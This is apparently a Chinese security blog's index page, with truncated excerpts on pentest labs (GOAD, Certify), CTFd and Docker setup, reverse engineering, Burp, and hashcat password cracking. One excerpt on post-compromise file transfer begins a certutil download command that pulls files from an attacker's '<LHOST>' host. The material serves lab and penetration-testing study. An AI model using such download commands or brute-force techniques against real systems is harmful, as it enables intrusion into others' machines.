lca

mac 上使用 docker 安装 项目地址：https://github.com/elliot-bia/nessus 安装 Copy docker run -itd --name=ramisec_nessus -p 8834:8834 ramisec/nessus 更新参考gi…

GOAD第二部分的内容主要包括查找用户名及爆破些密码。

国内 docker 源被下架后，局域网要拉取镜像如果不走代理真的拉不下来，自己搭建的 ctfd 平台需要从 dockerhub 上拉取镜像，所以就需要设置下代理。 环境： 局域网内的 ubuntu 主机需要 docker 拉取镜像，不是本机 本机 ip：192.168.10…

mumu 模拟器下载后，先进行如下设置 mumu 模拟器版本 1.4.11 开启可写系统盘 开启 root 权限 安装 adb Copy brew install android-platform-tools 查看 adb 的连接端口 列出模拟器设备 Copy adb…

tmux是一个终端复用器类自由软件，功能类似GNU Screen，但使用ISC许可证发布。用户可以通过tmux 在一个终端内管理多个分离的会话，窗口及面板，对于同时使用多个命令行，或多个任务时非常方便。

这是特别有用的工具，尤其是在需要长期运行进程或者在远程会话中保持会话不被断开的情况下。screen可以让开启的应用程序在后台运行。

拿到了服务器之后，就需要上传工具，或者从服务器下载文件，针对不同的场景（网络环境）可能需要用到不同的文件下载工具，平常打靶场也能用得到，这里就简单记录下。 windows Copy certutil -urlcache -split -f "http://<LHOST…

Certify是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。

Game Of Active directory的第二个版本，项目地址：https://github.com/Orange-Cyberdefense/GOAD 域靶场环境通过 vagrang 安装 5 个 windows 实例（三个 DC，两个普通域内主机），拓朴图如下： 官…

项目地址：https://github.com/VikParuchuri/marker 官方介绍说，Marker 将 PDF、EPUB 和 MOBI 转换为 markdown 文档，且比 nougat 快 10 倍。 官方只提供 linux 和 mac 的安装方式，参考在…

为了复现几个微信小程序的漏洞通报，特意记录下如何使用 mac 抓小程序的请求。 工具： mac 最新版微信 Proxifier yakit 打开Proxifier，设置代理 1、先设置代理服务器 添加 yakit 监听的端口 8083 2、设置代理规则 点击 + 号…

mac下设置多个java版本，可以通过alias命令进行实现，不同的java版本设置不同的变量，后面通过alias引用。

最近搭建CTFd平台后，需要结合docker做动态flag靶场，所以就在本地另起一台机器，做成docker私有仓库，记录下过程。

9.2 符号文件 目标文件：HOLA_REVERSER.exe 查看目标文件架构： 目标文件是 32 位程序，VC++ 2015 编译。 双击运行程序，提示输入数字 程序会判断输入的字符是否正确 9.3 定位 main 函数 先看下字符串 找到了目标程序运行时输出的一些…

burpsuite使用的一些技巧（更新）

汇总下平常使用比较多的google插件

平常信息收集用到的一些工具及站点，持续更新！

hashcat是一款暴力破解、密码恢复工具，被称为 “世界上最快、最先进的密码恢复实用程序”，Hashcat 可与John the Ripper一较高下。它是破解哈希的首选渗透测试工具，并且 hashcat 支持多种猜测密码的蛮力攻击，包括字典和掩码攻击。 以前在测试的中…